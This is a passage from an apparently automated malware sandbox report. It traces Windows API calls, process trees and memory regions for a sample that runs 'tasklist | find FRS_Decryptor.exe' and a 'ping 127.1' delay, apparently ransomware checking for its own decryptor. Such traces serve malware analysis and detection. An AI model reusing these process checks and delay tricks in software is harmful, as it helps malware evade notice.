lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xdaf8f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xdaf93c | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0xdaf93c*(hProcess=0x60, hThread=0x54, dwProcessId=0xb78, dwThreadId=0xb7c)) returned 1 [0114.477] CloseHandle (hObject=0x54) returned 1 [0114.477] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0114.477] GetEnvironmentStringsW () returned 0xe6ad78* [0114.477] FreeEnvironmentStringsA (penv="=") returned 1 [0114.477] DeleteProcThreadAttributeList (in: lpAttributeList=0xdaf968 | out: lpAttributeList=0xdaf968) [0114.478] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0114.478] _close (_FileHandle=4) returned 0 [0114.478] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0114.932] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0xdafcb0 | out: lpExitCode=0xdafcb0*=0x0) returned 1 [0114.932] CloseHandle (hObject=0x64) returned 1 [0114.932] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0114.933] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0xdafcb0 | out: lpExitCode=0xdafcb0*=0x0) returned 1 [0114.934] CloseHandle (hObject=0x60) returned 1 [0114.934] _get_osfhandle (_FileHandle=1) returned 0x260 [0114.934] SetConsoleMode (hConsoleHandle=0x260, dwMode=0x0) returned 0 [0114.934] _get_osfhandle (_FileHandle=1) returned 0x260 [0114.934] GetConsoleMode (in: hConsoleHandle=0x260, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0114.934] _get_osfhandle (_FileHandle=0) returned 0x24 [0114.934] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0114.934] SetConsoleInputExeNameW () returned 0x1 [0114.934] GetConsoleOutputCP () returned 0x1b5 [0114.934] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0114.934] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.934] exit (_Code=0) Process: id = "115" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0xf315000" os_pid = "0xb5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "114" os_parent_pid = "0xb54" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5924 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 5925 start_va = 0xe50000 end_va = 0xe6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 5926 start_va = 0xe70000 end_va = 0xe71fff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 5927 start_va = 0xe80000 end_va = 0xe8efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e80000" filename = "" Region: id = 5928 start_va = 0xe90000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 5929 start_va = 0xed0000 end_va = 0xf0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ed0000" filename = "" Region: id = 5930 start_va = 0xf10000 end_va = 0xf13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f10000" filename = "" Region: id = 5931 start_va = 0xf20000 end_va = 0xf20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f20000" filename = "" Region: id = 5932 start_va = 0xf30000 end_va = 0xf31fff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 5933 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5934 start_va = 0x7e7a0000 end_va = 0x7e7c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e7a0000" filename = "" Region: id = 5935 start_va = 0x7e7c9000 end_va = 0x7e7cbfff entry_point = 0x0 region_type = private name = "private_0x000000007e7c9000" filename = "" Region: id = 5936 start_va = 0x7e7cc000 end_va = 0x7e7ccfff entry_point = 0x0 region_type = private name = "private_0x000000007e7cc000" filename = "" Region: id = 5937 start_va = 0x7e7cf000 end_va = 0x7e7cffff entry_point = 0x0 region_type = private name = "private_0x000000007e7cf000" filename = "" Region: id = 5938 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5939 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5940 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5941 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5961 start_va = 0xf90000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 5962 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5963 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5964 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5969 start_va = 0xe50000 end_va = 0xe5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e50000" filename = "" Region: id = 5970 start_va = 0xe60000 end_va = 0xe63fff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 5971 start_va = 0xfa0000 end_va = 0x101dfff entry_point = 0xfa0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5972 start_va = 0x1130000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 5973 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 5974 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 5975 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 5976 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 5977 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 5978 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 5979 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5980 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 5981 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 5982 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5983 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5984 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5985 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5986 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5987 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5988 start_va = 0x7e6a0000 end_va = 0x7e79ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e6a0000" filename = "" Thread: id = 318 os_tid = 0xb48 Thread: id = 320 os_tid = 0xb6c Thread: id = 321 os_tid = 0xb70 Thread: id = 322 os_tid = 0xb60 Process: id = "116" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x5fc24000" os_pid = "0xb78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "114" os_parent_pid = "0xb54" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5943 start_va = 0xe10000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 5944 start_va = 0xe30000 end_va = 0xe31fff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 5945 start_va = 0xe40000 end_va = 0xe4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 5946 start_va = 0xe50000 end_va = 0xe8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 5947 start_va = 0xe90000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 5948 start_va = 0xed0000 end_va = 0xed3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ed0000" filename = "" Region: id = 5949 start_va = 0xee0000 end_va = 0xee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ee0000" filename = "" Region: id = 5950 start_va = 0xef0000 end_va = 0xef1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 5951 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 5952 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5953 start_va = 0x7eaa0000 end_va = 0x7eac2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eaa0000" filename = "" Region: id = 5954 start_va = 0x7eac6000 end_va = 0x7eac6fff entry_point = 0x0 region_type = private name = "private_0x000000007eac6000" filename = "" Region: id = 5955 start_va = 0x7eaca000 end_va = 0x7eacafff entry_point = 0x0 region_type = private name = "private_0x000000007eaca000" filename = "" Region: id = 5956 start_va = 0x7eacd000 end_va = 0x7eacffff entry_point = 0x0 region_type = private name = "private_0x000000007eacd000" filename = "" Region: id = 5957 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5958 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5959 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5960 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 5965 start_va = 0x1010000 end_va = 0x101ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 5966 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5967 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5968 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 319 os_tid = 0xb7c Process: id = "117" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x133ec000" os_pid = "0xb74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5989 start_va = 0x200000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5990 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 5991 start_va = 0x230000 end_va = 0x23efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 5992 start_va = 0x240000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 5993 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 5994 start_va = 0x2c0000 end_va = 0x2c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 5995 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 5996 start_va = 0x2e0000 end_va = 0x2e1fff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 5997 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 5998 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5999 start_va = 0x7e700000 end_va = 0x7e722fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e700000" filename = "" Region: id = 6000 start_va = 0x7e725000 end_va = 0x7e725fff entry_point = 0x0 region_type = private name = "private_0x000000007e725000" filename = "" Region: id = 6001 start_va = 0x7e729000 end_va = 0x7e729fff entry_point = 0x0 region_type = private name = "private_0x000000007e729000" filename = "" Region: id = 6002 start_va = 0x7e72d000 end_va = 0x7e72ffff entry_point = 0x0 region_type = private name = "private_0x000000007e72d000" filename = "" Region: id = 6003 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6004 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6005 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6006 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 6007 start_va = 0x330000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 6008 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6009 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6010 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6011 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 6012 start_va = 0x210000 end_va = 0x213fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6013 start_va = 0x340000 end_va = 0x3bdfff entry_point = 0x340000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6014 start_va = 0x4b0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 6015 start_va = 0x4e0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 6016 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 6017 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 6018 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6019 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6020 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6021 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6022 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 6023 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6024 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6025 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6026 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 6027 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6028 start_va = 0x7e600000 end_va = 0x7e6fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e600000" filename = "" Region: id = 6029 start_va = 0x2f0000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 6030 start_va = 0x3c0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 6031 start_va = 0x7e72a000 end_va = 0x7e72cfff entry_point = 0x0 region_type = private name = "private_0x000000007e72a000" filename = "" Region: id = 6032 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 6033 start_va = 0x220000 end_va = 0x222fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 6034 start_va = 0x400000 end_va = 0x400fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6035 start_va = 0x410000 end_va = 0x412fff entry_point = 0x410000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 6036 start_va = 0x420000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 6037 start_va = 0x460000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 6038 start_va = 0x7e5fd000 end_va = 0x7e5fffff entry_point = 0x0 region_type = private name = "private_0x000000007e5fd000" filename = "" Thread: id = 323 os_tid = 0xb68 [0114.983] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0114.983] __set_app_type (_Type=0x1) [0114.983] __p__fmode () returned 0x76ea1768 [0114.983] __p__commode () returned 0x76ea176c [0114.983] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0114.983] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0114.983] SetThreadUILanguage (LangId=0x0) returned 0x409 [0114.985] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.985] _fileno (_File=0x76ea4c28) returned 1 [0114.985] _get_osfhandle (_FileHandle=1) returned 0x28 [0114.985] GetFileType (hFile=0x28) returned 0x2 [0114.985] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x2bf488 | out: lpMode=0x2bf488) returned 0 [0114.985] GetLastError () returned 0x6 [0114.985] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x2bf3ec, nSize=0x50 | out: lpBuffer="䤐N") returned 0x0 [0114.985] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0114.987] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x2bf4a4 | out: phkResult=0x2bf4a4*=0x88) returned 0x0 [0114.987] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x2bf498, lpData=0x2bf4a0, lpcbData=0x2bf49c*=0x4 | out: lpType=0x2bf498*=0x0, lpData=0x2bf4a0*=0x0, lpcbData=0x2bf49c*=0x4) returned 0x2 [0114.987] RegCloseKey (hKey=0x88) returned 0x0 [0114.987] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0x2bf468*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x2bf4a4 | out: ppResult=0x2bf4a4*=0x4ec430*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4e89a0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0114.987] FreeAddrInfoW (pAddrInfo=0x4ec430*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4e89a0*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0114.987] IcmpCreateFile () returned 0x4e6b10 [0114.990] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 